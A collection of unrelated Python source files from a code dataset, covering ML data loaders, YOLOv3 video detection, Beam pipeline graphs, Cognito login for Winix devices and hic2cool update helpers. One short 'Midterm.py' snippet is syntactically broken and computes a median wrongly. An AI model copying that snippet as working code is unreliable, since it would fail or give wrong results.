            )
            for shuffle in [False, shuffle_batches_chunks]
        ]
        self._pair_loader_sequential, self._pair_loader_shuffled = [
            DataLoader(
                pair_dataset,
                batch_size=batch_size_pairs,
                shuffle=shuffle,
                drop_last=False,
                num_workers=1,
            )
            for shuffle in [False, shuffle_batches_pairs]
        ]
        self._n_chunks = len(chunk_dataset)
        self._chunk_length = chunk_length

    @property
    def chunk_loader(self):
        """Shuffled DataLoader over rollout chunks."""
        return self._chunk_loader_shuffled

    @property
    def pair_loader(self):
        """Shuffled pair loader with batches post-processed into TransitionTuples."""
        return map(self._process_pair_batch, self._pair_loader_shuffled)

    @property
    def n_chunks(self):
        """Number of chunks in the chunk dataset."""
        return self._n_chunks

    @property
    def chunk_length(self):
        """Time steps per chunk."""
        return self._chunk_length

    def get_chunks_as_batch(self, max_chunks=None):
        """Stack up to `max_chunks` chunks into one CUDA batch (time, batch, ...)."""
        keys = ["action", "reward", "observation", "rendering"]
        accumulated_chunk_data = {k: [] for k in keys}
        for chunk_data in self.chunk_iterator(max_chunks):
            for k in keys:
                accumulated_chunk_data[k].append(
                    torch.as_tensor(chunk_data[k]).float().cuda()
                )
        # Stack along dim=1 so that dim 0 remains the time axis.
        stacked_chunk_data = {
            k: torch.stack(v, dim=1) for k, v in accumulated_chunk_data.items()
        }
        return stacked_chunk_data

    def chunk_iterator(self, max_chunks=None):
        """Yield individual chunks as dicts of CUDA float tensors."""
        keys = ["action", "reward", "observation", "rendering"]
        _it = range(len(self._chunk_dataset))
        if max_chunks is not None:
            _it = islice(_it, max_chunks)
        for chunk_idx in _it:
            yield {
                k: torch.as_tensor(self._chunk_dataset[chunk_idx][k]).float().cuda()
                for k in keys
            }

    def get_pairs_as_batch(self, max_pairs=None):
        """Accumulate up to `max_pairs` transition pairs into one processed batch."""
        acc_batch = defaultdict(list)
        items_missing = max_pairs
        for batch in self._pair_loader_shuffled:
            bs = len(batch[list(batch.keys())[0]])
            if max_pairs is not None:
                # Take only as many items as still needed, then stop.
                for k, v in batch.items():
                    acc_batch[k].append(v[:items_missing])
                items_missing -= bs
                if items_missing <= 0:
                    break
            else:
                for k, v in batch.items():
                    acc_batch[k].append(v)
        # Concatenate per-key tensor lists into single tensors.
        for k, v in acc_batch.items():
            if isinstance(v, (list, tuple)) and isinstance(v[0], torch.Tensor):
                acc_batch[k] = torch.cat(v, dim=0)
        return self._process_pair_batch(acc_batch)

    def _process_pair_batch(self, pair_batch):
        """Reshape a raw pair batch into action/reward plus TransitionTuples."""
        # Move time to dim 0 and put everything on CUDA as float.
        t_b_dim_batch = {
            k: t.transpose(0, 1).float().cuda()
            for k, t in pair_batch.items()
            if k in ["action", "reward", "observation", "rendering"]
        }
        # action applied to second-to-last state
        action = t_b_dim_batch["action"][-2, ...]
        # reward collected when entering last state
        reward = t_b_dim_batch["reward"][-1, ...]
        observation = TransitionTuple(
            current=t_b_dim_batch["observation"][-2, ...],
            next=t_b_dim_batch["observation"][-1, ...],
        )
        rendering = TransitionTuple(
            current=t_b_dim_batch["rendering"][-2, ...],
            next=t_b_dim_batch["rendering"][-1, ...],
        )
        # Histories are the full sequence shifted by one step.
        rendering_history = TransitionTuple(
            current=t_b_dim_batch["rendering"][:-1, ...],
            next=t_b_dim_batch["rendering"][1:, ...],
        )
        return dict(
            action=action,
            reward=reward,
            observation=observation,
            rendering=rendering,
            rendering_history=rendering_history,
        )
def load_processed_train_batch(config, vae, max_pairs, with_observation=False):
    """Load a batch of training transition pairs and encode them with `vae`.

    Returns (latent, action, reward) -- plus the raw observation tuple when
    with_observation is True. Used e.g. for inferring latent scaling from
    training data.
    """
    env_name, env_kwargs = get_random_collection_env(config["data"]["task_name"])
    train_data = load_data(
        env_name,
        env_kwargs,
        split_name="train",
        n_rollouts_total=config["n_train_rollouts_total"],
        n_rollouts_subset=config["n_train_rollouts_subset"],
        rollout_length=config["data"]["rollout_length"],
        chunk_length=config["data"]["chunk_length"],
        batch_size_chunks=1,
        batch_size_pairs=1024,
        shuffle_batches_chunks=True,
        shuffle_batches_pairs=True,
        data_base_dir=config["data"]["data_base_dir"],
        subset_shuffle_seed=config["data"]["subset_shuffle_seed"],
    )
    pair_batch = train_data.get_pairs_as_batch(max_pairs=max_pairs)
    # Encoding is inference-only; no gradients needed.
    with torch.no_grad():
        latent = encode_batch_of_pairs(pair_batch, vae)
    action = pair_batch["action"]
    reward = pair_batch["reward"]
    if with_observation:
        observation = pair_batch["observation"]
        return latent, action, reward, observation
    else:
        return latent, action, reward
@data_ingredient.capture
def load_data(
    env_name,
    env_kwargs,
    split_name,
    n_rollouts_total,
    n_rollouts_subset,
    rollout_length,
    chunk_length,
    batch_size_chunks,
    batch_size_pairs,
    shuffle_batches_chunks,
    shuffle_batches_pairs,
    data_base_dir,
    subset_shuffle_seed,
):
    """Build a DataHandler over rollout data for one environment/split.

    Two RolloutDataset views are created over the same rollouts: one that
    yields subsequences of `chunk_length` steps, and one that yields
    3-step subsequences from which transition pairs are derived.

    Parameters
    ----------
    env_name, env_kwargs : gym env id and construction kwargs
    split_name : dataset split ('train', ...)
    n_rollouts_total : number of rollouts available on disk
    n_rollouts_subset : number of rollouts to actually use (sampled)
    rollout_length : steps per stored rollout
    chunk_length : steps per training chunk
    batch_size_chunks, batch_size_pairs : loader batch sizes
    shuffle_batches_chunks, shuffle_batches_pairs : loader shuffling flags
    data_base_dir : root directory containing the rollout data
    subset_shuffle_seed : seed used when sampling the rollout subset

    Returns
    -------
    DataHandler wrapping the chunk and pair datasets.
    """
    register_envs()
    # Images get per-pixel Gaussian noise on load (simple augmentation).
    image_transform = transforms.Compose([transforms.ToTensor(), gaussian_noise])
    print("Loading chunks...")
    chunk_dataset = RolloutDataset(
        data_base_dir=data_base_dir,
        split_name=split_name,
        env_name=env_name,
        env_kwargs=env_kwargs,
        n_rollouts_total=n_rollouts_total,
        n_rollouts_subset=n_rollouts_subset,
        rollout_length=rollout_length,
        rollout_subset_sampling_seed=subset_shuffle_seed,
        subsequence_length=chunk_length,
        image_transform=image_transform,
    )
    print("Loading transitions...")
    # Length-3 windows: enough history for (current, next) pair extraction.
    pair_dataset = RolloutDataset(
        data_base_dir=data_base_dir,
        split_name=split_name,
        env_name=env_name,
        env_kwargs=env_kwargs,
        n_rollouts_total=n_rollouts_total,
        n_rollouts_subset=n_rollouts_subset,
        rollout_length=rollout_length,
        rollout_subset_sampling_seed=subset_shuffle_seed,
        subsequence_length=3,
        image_transform=image_transform,
    )
    return DataHandler(
        chunk_dataset,
        pair_dataset,
        chunk_length,
        batch_size_chunks=batch_size_chunks,
        batch_size_pairs=batch_size_pairs,
        shuffle_batches_chunks=shuffle_batches_chunks,
        shuffle_batches_pairs=shuffle_batches_pairs,
    )
| 2.03125 | 2 |
info/migrations/0016_alter_attendanceclass_options.py | theluney/DataBase-project | 0 | 12757362 | # Generated by Django 3.2 on 2021-04-22 17:14
from django.db import migrations
class Migration(migrations.Migration):
    """Meta-only migration: sets verbose names on AttendanceClass (no schema change)."""

    dependencies = [
        ('info', '0015_attendancerange'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='attendanceclass',
            options={'verbose_name': 'Attendance', 'verbose_name_plural': 'Attendance'},
        ),
    ]
| 1.390625 | 1 |
blackmamba/lib/future/moves/subprocess.py | oz90210/blackmamba | 2,151 | 12757363 | from __future__ import absolute_import
from future.utils import PY2, PY26
from subprocess import *
if PY2:
    __future_module__ = True
    # Python 2: these helpers lived in the (since-removed) `commands` module.
    from commands import getoutput, getstatusoutput
if PY26:
    # Python 2.6 lacks subprocess.check_output; pull in the backport.
    from future.backports.misc import check_output
| 1.570313 | 2 |
YOLOv3_video.py | HarryPham0123/YOLOv3-object-detection | 3 | 12757364 | import cv2
import numpy as np
import argparse
# we are not going to bother with objects less than 30% probability
THRESHOLD = 0.3
# the lower the value: the fewer bounding boxes will remain
SUPPRESSION_THRESHOLD = 0.3
# square input resolution expected by the YOLOv3 network (pixels)
YOLO_IMAGE_SIZE = 320
DATA_FOLDER = './data/'      # class-name files (e.g. coco.names)
CFG_FOLDER = './cfg/'        # network configuration files
MODEL_FOLDER = './models/'   # pre-trained weight files
def find_objects(model_outputs):
    """
    Extract detections from the YOLOv3 prediction vectors.

    Returns:
        keep_indexes: indexes of bounding boxes surviving non-max suppression
        boxes: [x, y, w, h] for every candidate bounding box (pre-NMS)
        class_ids: predicted COCO class index per candidate box
        confidences: probability that the predicted class is correct
    """
    boxes = []
    class_ids = []
    confidences = []
    # YOLOv3 emits predictions from three output layers.
    for layer_output in model_outputs:
        for detection in layer_output:
            class_scores = detection[5:]
            best_class = np.argmax(class_scores)
            best_score = class_scores[best_class]
            # Skip anything below the detection threshold.
            if best_score <= THRESHOLD:
                continue
            # Predictions are normalized to [0, 1]; rescale to the
            # 320x320 network input and convert center -> top-left corner.
            w = int(detection[2] * YOLO_IMAGE_SIZE)
            h = int(detection[3] * YOLO_IMAGE_SIZE)
            x = int(detection[0] * YOLO_IMAGE_SIZE - w / 2)
            y = int(detection[1] * YOLO_IMAGE_SIZE - h / 2)
            boxes.append([x, y, w, h])
            class_ids.append(best_class)
            confidences.append(float(best_score))
    # Non-max suppression prunes overlapping candidates.
    keep_indexes = cv2.dnn.NMSBoxes(boxes, confidences, THRESHOLD, SUPPRESSION_THRESHOLD)
    return keep_indexes, boxes, class_ids, confidences
def show_detected_images(img, bounding_box_ids, all_bounding_boxes, classes, class_ids,
                         confidence_values, width_ratio, height_ratio, colors):
    """
    Drawing the bounding boxes on the original images
    Args:
        img: Original image (modified in place)
        bounding_box_ids: Idx of predicted bounding boxes after applying "Non-max suppression"
        all_bounding_boxes: all vec (x, y, w, h) of each chosen bounding box
        classes: list of all classes in COCO dataset
        class_ids: idx for each predicted class of each bounding box based on COCO dataset's classes
        confidence_values: Probability that the predicted class is correct
        width_ratio: = original_width / YOLO_IMAGE_SIZE
        height_ratio: = original_height / YOLO_IMAGE_SIZE
        colors: per-class BGR colors (numpy array, one row per class)
    """
    # Iterate over each box index kept after non-max suppression.
    for idx in bounding_box_ids.flatten():
        bounding_box = all_bounding_boxes[idx]
        x, y, w, h = int(bounding_box[0]), int(bounding_box[1]), int(bounding_box[2]), int(bounding_box[3])
        # Scale (x, y, w, h) from the resized (320x320) frame back to the
        # original image size.
        x = int(x * width_ratio)
        y = int(y * height_ratio)
        w = int(w * width_ratio)
        h = int(h * height_ratio)
        # Color for this detection's class (cv2 wants a plain Python list).
        color_box_current = colors[class_ids[idx]].tolist()
        # Draw the bounding box for the detected object.
        cv2.rectangle(img, (x, y), (x + w, y + h), color_box_current, 2)
        # Label the box with "<class> <confidence>%".
        text_box = classes[int(class_ids[idx])] + ' ' + str(int(confidence_values[idx] * 100)) + '%'
        cv2.putText(img, text_box, (x, y - 10), cv2.FONT_HERSHEY_COMPLEX_SMALL, 0.5, color_box_current, 1)
def parse_opt(known=False):
    """Build and parse the command-line options for the detector script.

    Args:
        known: when True, ignore unrecognized arguments instead of erroring.

    Returns:
        The parsed argparse.Namespace.
    """
    parser = argparse.ArgumentParser()
    option_specs = [
        ('--video_path', '', 'initial image path'),
        ('--class_path', DATA_FOLDER + 'coco.names', 'initial class file path'),
        ('--cfg_path', CFG_FOLDER + 'yolov3.cfg', 'initial cfg file path'),
        ('--weights_path', MODEL_FOLDER + 'yolov3.weights',
         'initial pre-trained weights file path'),
    ]
    for flag, default, help_text in option_specs:
        parser.add_argument(flag, type=str, default=default, help=help_text)
    if known:
        return parser.parse_known_args()[0]
    return parser.parse_args()
def main(opt):
    """Run YOLOv3 object detection on a video stream and display annotated frames.

    Args:
        opt: parsed CLI options with video_path, class_path, cfg_path and
            weights_path attributes (see parse_opt).
    """
    # Class labels for prediction (COCO: 80 classes, one per line).
    with open(opt.class_path) as f:
        labels = [line.strip() for line in f]
    # One random color per label, used for the bounding boxes.
    colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8')
    # Read the configuration file & initialize the weights of the YOLOv3 model.
    neural_network = cv2.dnn.readNetFromDarknet(opt.cfg_path, opt.weights_path)
    # Run inference on the CPU.
    neural_network.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
    neural_network.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)
    # VIDEO PROCESSING
    video_capture = cv2.VideoCapture(opt.video_path)
    while video_capture.isOpened():
        # Read each frame of the video.
        is_grab, frame = video_capture.read()
        # Bug fix: stop as soon as a frame cannot be grabbed (end of stream).
        # Previously the frame was used before this check, so the loop crashed
        # on `frame is None` at end of video.
        if not is_grab:
            break
        original_width, original_height = frame.shape[1], frame.shape[0]
        # Preprocess the frame (scale to [0,1], resize, BGR->RGB) for the net.
        blob = cv2.dnn.blobFromImage(frame, 1 / 255, (YOLO_IMAGE_SIZE, YOLO_IMAGE_SIZE), True, crop=False)
        neural_network.setInput(blob)
        # Run forward propagation up to the (unconnected) output layers.
        # NOTE(review): the `idx[0] - 1` indexing matches OpenCV versions where
        # getUnconnectedOutLayers() returns Nx1 arrays; newer releases return a
        # flat array (`idx - 1`) — confirm against the deployed cv2 version.
        layer_names = neural_network.getLayerNames()
        output_names = [layer_names[idx[0] - 1] for idx in neural_network.getUnconnectedOutLayers()]
        outputs = neural_network.forward(output_names)
        # Extract boxes/classes/confidences from the prediction vectors.
        predicted_objects_idx, bbox_locations, class_label_ids, conf_values = find_objects(outputs)
        # Draw the surviving bounding boxes on the original frame.
        show_detected_images(frame, predicted_objects_idx, bbox_locations, labels, class_label_ids, conf_values,
                             original_width / YOLO_IMAGE_SIZE, original_height / YOLO_IMAGE_SIZE, colors)
        cv2.imshow('YOLO Algorithm', frame)
        # Press "ESC" (key code 27) to quit the video.
        key = cv2.waitKey(1) & 0xff
        if key == 27:
            break
    # Destroy windows & release the capture device.
    video_capture.release()
    cv2.destroyAllWindows()
if __name__ == "__main__":
    # Script entry point: parse CLI options and run the detector.
    opt = parse_opt()
    main(opt)
| 3.03125 | 3 |
sfm_torch/utils/kitti.py | ArthurAllshire/sfm-torch | 0 | 12757365 | import torch
import pykitti
from torch.utils.data import Dataset
from torchvision.utils import make_grid
import torchvision.transforms.functional as TF
import matplotlib.pyplot as plt
def transform_stereo_lidar(samples):
    """Convert every value in *samples* to a torch tensor, in place.

    Returns the same dict for convenience.
    """
    samples.update({key: TF.to_tensor(value) for key, value in samples.items()})
    return samples
class KittiDenseDrive(Dataset):
    """Dataset for prediction of dense (images) from the Kitti Dataset."""
    def __init__(self, basedir, date, drive, transform=None):
        """
        Args:
            basedir: root directory of the raw KITTI data.
            date: recording date string (e.g. '2011_09_26').
            drive: drive identifier within that date.
            transform: optional callable applied to the sample dict.
        """
        self.basedir = basedir
        self.date = date
        self.drive = drive
        self.kitti = pykitti.raw(basedir, date, drive)
        self.transform = transform
    def __len__(self):
        return len(self.kitti)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        # rgb - left (cam2), right (cam3)
        cam2, cam3 = self.kitti.get_rgb(idx)
        # velodyne scan
        velo = self.kitti.get_velo(idx)
        samples = {"left_rgb": cam2, "right_rgb": cam3, "velo": velo}
        # Bug fix: transform defaults to None but was called unconditionally,
        # raising TypeError whenever no transform was supplied.
        if self.transform is not None:
            samples = self.transform(samples)
        return samples
| 2.796875 | 3 |
sdks/python/apache_beam/runners/interactive/pipeline_graph.py | h4rr21/beam | 1 | 12757366 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""For generating Beam pipeline graph in DOT representation.
This module is experimental. No backwards-compatibility guarantees.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import pydot
class PipelineGraph(object):
  """Creates a DOT representation of the pipeline. Thread-safe."""

  def __init__(self,
               pipeline_proto,
               default_vertex_attrs=None,
               default_edge_attrs=None):
    """Constructor of PipelineGraph.

    Args:
      pipeline_proto: (Pipeline proto)
      default_vertex_attrs: (Dict[str, str]) a dict of default vertex attributes
      default_edge_attrs: (Dict[str, str]) a dict of default edge attributes
    """
    self._lock = threading.Lock()
    self._graph = None
    # Bug fix: _generate_graph_dicts() reads self._pipeline_proto, but the
    # proto was never stored on the instance, so construction raised
    # AttributeError. Keep a reference before building the graph dicts.
    self._pipeline_proto = pipeline_proto

    # A dict from PCollection ID to a list of its consuming Transform IDs
    self._consumers = collections.defaultdict(list)
    # A dict from PCollection ID to its producing Transform ID
    self._producers = {}

    transforms = pipeline_proto.components.transforms
    for transform_id, transform in transforms.items():
      # Only top-level transforms are rendered as graph vertices.
      if not self._is_top_level_transform(transform):
        continue
      for pcoll_id in transform.inputs.values():
        self._consumers[pcoll_id].append(transform_id)
      for pcoll_id in transform.outputs.values():
        self._producers[pcoll_id] = transform_id

    vertex_dict, edge_dict = self._generate_graph_dicts()
    self._construct_graph(vertex_dict,
                          edge_dict,
                          default_vertex_attrs,
                          default_edge_attrs)

  def get_dot(self):
    """Returns the DOT representation of the pipeline graph as a string."""
    return str(self._get_graph())

  def _is_top_level_transform(self, transform):
    """True for named transforms that are not nested ('/') or internal refs."""
    return transform.unique_name and '/' not in transform.unique_name \
        and not transform.unique_name.startswith('ref_')

  def _generate_graph_dicts(self):
    """From pipeline_proto and other info, generate the graph.

    Returns:
      vertex_dict: (Dict[str, Dict[str, str]]) vertex mapped to attributes.
      edge_dict: (Dict[(str, str), Dict[str, str]]) vertex pair mapped to the
          edge's attribute.
    """
    transforms = self._pipeline_proto.components.transforms

    # A dict from vertex name (i.e. PCollection ID) to its attributes.
    vertex_dict = collections.defaultdict(dict)
    # A dict from vertex name pairs defining the edge (i.e. a pair of PTransform
    # IDs defining the PCollection) to its attributes.
    edge_dict = collections.defaultdict(dict)

    # Maps a PCollection ID to all (producer, consumer) vertex pairs it spans,
    # so _update_graph can address edges either way.
    self._edge_to_vertex_pairs = collections.defaultdict(list)

    for _, transform in transforms.items():
      if not self._is_top_level_transform(transform):
        continue

      vertex_dict[transform.unique_name] = {}

      for pcoll_id in transform.outputs.values():
        # For PCollections without consuming PTransforms, we add an invisible
        # PTransform node as the consumer.
        if pcoll_id not in self._consumers:
          invisible_leaf = 'leaf%s' % (hash(pcoll_id) % 10000)
          vertex_dict[invisible_leaf] = {'style': 'invis'}
          self._edge_to_vertex_pairs[pcoll_id].append(
              (transform.unique_name, invisible_leaf))
          edge_dict[(transform.unique_name, invisible_leaf)] = {}
        else:
          for consumer in self._consumers[pcoll_id]:
            producer_name = transform.unique_name
            consumer_name = transforms[consumer].unique_name
            self._edge_to_vertex_pairs[pcoll_id].append(
                (producer_name, consumer_name))
            edge_dict[(producer_name, consumer_name)] = {}

    return vertex_dict, edge_dict

  def _get_graph(self):
    """Returns pydot.Dot object for the pipeline graph.

    The purpose of this method is to avoid accessing the graph while it is
    updated. No one except for this method should be accessing _graph directly.

    Returns:
      (pydot.Dot)
    """
    with self._lock:
      return self._graph

  def _construct_graph(self, vertex_dict, edge_dict,
                       default_vertex_attrs, default_edge_attrs):
    """Constructs the pydot.Dot object for the pipeline graph.

    Args:
      vertex_dict: (Dict[str, Dict[str, str]]) maps vertex names to attributes
      edge_dict: (Dict[(str, str), Dict[str, str]]) maps vertex name pairs to
          attributes
      default_vertex_attrs: (Dict[str, str]) a dict of attributes
      default_edge_attrs: (Dict[str, str]) a dict of attributes
    """
    with self._lock:
      self._graph = pydot.Dot()

      if default_vertex_attrs:
        self._graph.set_node_defaults(**default_vertex_attrs)
      if default_edge_attrs:
        self._graph.set_edge_defaults(**default_edge_attrs)

      self._vertex_refs = {}  # Maps vertex name to pydot.Node
      self._edge_refs = {}  # Maps vertex name pairs to pydot.Edge

      for vertex, vertex_attrs in vertex_dict.items():
        vertex_ref = pydot.Node(vertex, **vertex_attrs)
        self._vertex_refs[vertex] = vertex_ref
        self._graph.add_node(vertex_ref)

      for edge, edge_attrs in edge_dict.items():
        edge_ref = pydot.Edge(edge[0], edge[1], **edge_attrs)
        self._edge_refs[edge] = edge_ref
        self._graph.add_edge(edge_ref)

  def _update_graph(self, vertex_dict=None, edge_dict=None):
    """Updates the pydot.Dot object with the given attribute update

    Args:
      vertex_dict: (Dict[str, Dict[str, str]]) maps vertex names to attributes
      edge_dict: This should be
          Either (Dict[str, Dict[str, str]]) which maps edge names to attributes
          Or (Dict[(str, str), Dict[str, str]]) which maps vertex pairs to edge
          attributes
    """
    def set_attrs(ref, attrs):
      for attr_name, attr_val in attrs.items():
        ref.set(attr_name, attr_val)

    with self._lock:
      if vertex_dict:
        for vertex, vertex_attrs in vertex_dict.items():
          set_attrs(self._vertex_refs[vertex], vertex_attrs)
      if edge_dict:
        for edge, edge_attrs in edge_dict.items():
          if isinstance(edge, tuple):
            # Keyed by an explicit (producer, consumer) vertex pair.
            set_attrs(self._edge_refs[edge], edge_attrs)
          else:
            # Keyed by PCollection ID: update every edge that PCollection spans.
            for vertex_pair in self._edge_to_vertex_pairs[edge]:
              set_attrs(self._edge_refs[vertex_pair], edge_attrs)
| 1.875 | 2 |
basis_func_list.py | jun63x/sparse_coding | 0 | 12757367 | <filename>basis_func_list.py
import matplotlib.pyplot as plt
from tqdm import tqdm
class BasisFuncList:
    """Holds a list of 2-D basis functions and can dump them as PNG images."""

    def __init__(self, basis_func_list):
        # Sequence of 2-D arrays, one per basis function / patch.
        self.basis_func_list = basis_func_list

    def save(self, img_dir):
        """Write every basis function into `img_dir` as patchNNN.png (binary cmap)."""
        total = len(self.basis_func_list)
        progress = tqdm(enumerate(self.basis_func_list), total=total, ncols=50)
        for index, basis_func in progress:
            target = img_dir + '/patch' + str(index).zfill(3) + '.png'
            plt.imsave(target, basis_func, cmap='binary')
| 2.390625 | 2 |
Midterm.py | anyrama/ITP27-Thuany | 0 | 12757368 | def middle_element (lst):
if len(lst)%2 == 1
index1 = int(len(lst)/2-0.5)
indext2 = -(int(len(lst)/2))
median = (lst[index1]+ lst[index2])/2
return median
else:
index= int(len(lst)/2-0.5)
return lst[index]
print (middle_element([5,2,-4]))
| 3.75 | 4 |
winix/auth.py | dgsharpe/winix | 0 | 12757369 | <reponame>dgsharpe/winix<gh_stars>0
from dataclasses import dataclass
import boto3
import boto3
from botocore import UNSIGNED
from botocore.client import Config
# AWS Cognito identifiers for the Winix user pool.
# Pulled from Winix Home v1.0.8 APK
COGNITO_APP_CLIENT_ID = "14og512b9u20b8vrdm55d8empi"
COGNITO_CLIENT_SECRET_KEY = "<KEY>"  # NOTE(review): redacted placeholder — real secret required at runtime
COGNITO_USER_POOL_ID = "us-east-1_Ofd50EosD"
COGNITO_REGION = "us-east-1"
@dataclass
class WinixAuthResponse:
    """Token bundle returned by the Cognito authentication flow."""
    user_id: str  # Cognito "sub" claim identifying the user
    access_token: str  # bearer token used for API calls
    refresh_token: str  # long-lived token used to mint new access tokens
    id_token: str  # OIDC identity token
def login(username: str, password: str, **kwargs):
    """Authenticate against Cognito (SRP flow) and return fresh credentials.

    Args:
        username: account username (e-mail).
        password: account password.
        **kwargs: optional overrides — pool_id, client_id, client_secret,
            pool_region — falling back to the module-level Cognito constants.

    Returns:
        WinixAuthResponse with user_id (the token's "sub" claim) and the
        access/refresh/id tokens.
    """
    # Imported lazily so importing this module does not require warrant_lite/jose.
    from warrant_lite import WarrantLite
    from jose import jwt

    wl = WarrantLite(
        username=username,
        password=password,
        pool_id=kwargs.get("pool_id", COGNITO_USER_POOL_ID),
        client_id=kwargs.get("client_id", COGNITO_APP_CLIENT_ID),
        client_secret=kwargs.get("client_secret", COGNITO_CLIENT_SECRET_KEY),
        client=_boto_client(kwargs.get("pool_region")),
    )
    resp = wl.authenticate_user()
    return WinixAuthResponse(
        # The "sub" claim identifies the user; unverified read is fine here
        # since the token was just issued to us over TLS.
        user_id=jwt.get_unverified_claims(resp["AuthenticationResult"]["AccessToken"])[
            "sub"
        ],
        access_token=resp["AuthenticationResult"]["AccessToken"],
        refresh_token=resp["AuthenticationResult"]["RefreshToken"],
        id_token=resp["AuthenticationResult"]["IdToken"],
    )
def refresh(user_id: str, refresh_token: str, **kwargs) -> WinixAuthResponse:
    """Exchange a refresh token for new access/id tokens.

    Args:
        user_id: Cognito "sub" of the user (used to compute the secret hash).
        refresh_token: token obtained from a previous login().
        **kwargs: optional overrides — client_id, client_secret, pool_region.

    Returns:
        WinixAuthResponse; note the original refresh_token is carried through
        (the REFRESH_TOKEN flow does not issue a new one).
    """
    from warrant_lite import WarrantLite

    client_id = kwargs.get("client_id", COGNITO_APP_CLIENT_ID)
    auth_params = {
        "REFRESH_TOKEN": refresh_token,
        # Cognito requires HMAC(username + client_id, client_secret).
        "SECRET_HASH": WarrantLite.get_secret_hash(
            username=user_id,
            client_id=client_id,
            client_secret=kwargs.get("client_secret", COGNITO_CLIENT_SECRET_KEY),
        ),
    }
    resp = _boto_client(kwargs.get("pool_region")).initiate_auth(
        ClientId=client_id, AuthFlow="REFRESH_TOKEN", AuthParameters=auth_params,
    )
    return WinixAuthResponse(
        user_id=user_id,
        access_token=resp["AuthenticationResult"]["AccessToken"],
        refresh_token=refresh_token,
        id_token=resp["AuthenticationResult"]["IdToken"],
    )
def _boto_client(region):
    """Build an anonymous (unsigned) Cognito IDP client for the given region."""
    effective_region = region if region else COGNITO_REGION
    anonymous_config = Config(signature_version=UNSIGNED)
    return boto3.client(
        "cognito-idp", config=anonymous_config, region_name=effective_region
    )
| 2.1875 | 2 |
source/pic2card/app/api.py | riag23/AdaptiveCards | 1 | 12757370 | """Flask service to predict the adaptive card json from the card design"""
import os
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask_cors import CORS
from flask_restplus import Api
from mystique.utils import load_od_instance
from . import resources as res
from mystique import config
# Module logger: the rotating file handler below attaches here so that
# "mystique.*" package loggers propagate into mystique_app.log.
# Bug fix: the logger name was misspelled "mysitque", which attached the
# handler to an unused logger tree and left the file empty.
logger = logging.getLogger("mystique")
logger.setLevel(logging.DEBUG)

# Suppress the tf warnings.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '3'

# Rotate the app log at 100 MB, keeping 20 backups.
file_handler = RotatingFileHandler(
    'mystique_app.log', maxBytes=1024 * 1024 * 100, backupCount=20)
formatter = logging.Formatter(
    "%(asctime)s - [%(filename)s:%(lineno)s - %(funcName)20s() ] - \
    %(levelname)s - %(message)s")
file_handler.setFormatter(formatter)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)

app = Flask(__name__)
CORS(app)
api = Api(app, title="Mystique", version="1.0",
          default="Jobs", default_label="",
          description="Mysique App For Adaptive card Json Prediction from \
    UI Design")

api.add_resource(res.GetCardTemplates, '/get_card_templates',
                 methods=['GET'])

# Conditional loading helps to reduce the bundle size, as we don't need to
# package the tensorflow.
# TODO: Experimental API
if config.ENABLE_TF_SERVING:
    api.add_resource(res.TfPredictJson, '/tf_predict_json',
                     methods=['POST'])
else:
    api.add_resource(res.PredictJson, '/predict_json', methods=['POST'])

# Load the models and cache it for request handling.
app.od_model = load_od_instance()

# Include more debug points along with /predict_json api.
api.add_resource(res.DebugEndpoint, "/predict_json_debug", methods=["POST"])
api.add_resource(res.GetVersion, "/version", methods=["GET"])
| 2.25 | 2 |
hic2cool/hic2cool_updates.py | pkerpedjiev/hic2cool | 36 | 12757371 | """
This module contains updates used with the `hic2cool update` command.
See usage in hic2cool.hic2cool_utils.hic2cool_update
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals
)
import h5py
from .hic2cool_config import *
def prepare_hic2cool_updates(version_nums):
    """
    Find what must be done when actually running `hic2cool update`
    Determines what updates are necessary based off of version numbers
    Version numbers is a list of ints in form: [major, minor, release]
    """
    major, minor = version_nums[0], version_nums[1]
    updates = []
    # normalization vectors were inverted before version 0.5.0
    if major == 0 and minor < 5:
        updates.append({
            'title': 'Invert weights',
            'effect': 'Invert cooler weights so that they match original hic normalization values',
            'detail': 'cooler uses multiplicative weights and hic uses divisive weights. Before version 0.5.0, hic2cool inverted normalization vectors for consistency with cooler behavior, but now that is no longer done for consistency with 4DN analysis pipelines.',
            'function': update_invert_weights
        })
    # important cooler attributes added in version 0.6.0
    if major == 0 and minor < 6:
        updates.append({
            'title': 'Add cooler schema version',
            'effect': 'Add a couple important cooler schema attributes',
            'detail': 'Adds format-version and storage-mode attributes to hdf5 for compatibility with cooler schema v3.',
            'function': update_cooler_schema_v3
        })
    # mcool attributes added in version 0.7.1
    # (release index only consulted when minor == 7, keeping the original
    # short-circuit behaviour for two-element version lists)
    if major == 0 and (minor < 7 or (minor == 7 and version_nums[2] < 1)):
        updates.append({
            'title': 'Add mcool schema attributes',
            'effect': 'Adds missing schema attributes if this is a multi-resolution cooler',
            'detail': 'Adds format and format-version attributes to the "/" hdf5 collection for mcool schema v2.',
            'function': update_mcool_schema_v2
        })
    return updates
def norm_convert(val):
    """
    Invert a single hic normalization value; zero maps to NaN.

    hic2cool now just uses hic normalization vectors as-is, without
    attempting to invert them to match cooler convention, so this helper
    is only used by `hic2cool update` to revert cooler weights to their
    original hic values (hic norms are divisive, cooler weights are
    multiplicative).
    """
    return np.nan if val == 0.0 else 1 / val
def update_invert_weights(writefile):
    """
    Invert all the weights from each resolution (if a mult-res file) or the
    top level (if a single-res file)

    Args:
        writefile: path to an existing cooler/mcool hdf5 file, modified in place.
    """
    # helper fxn
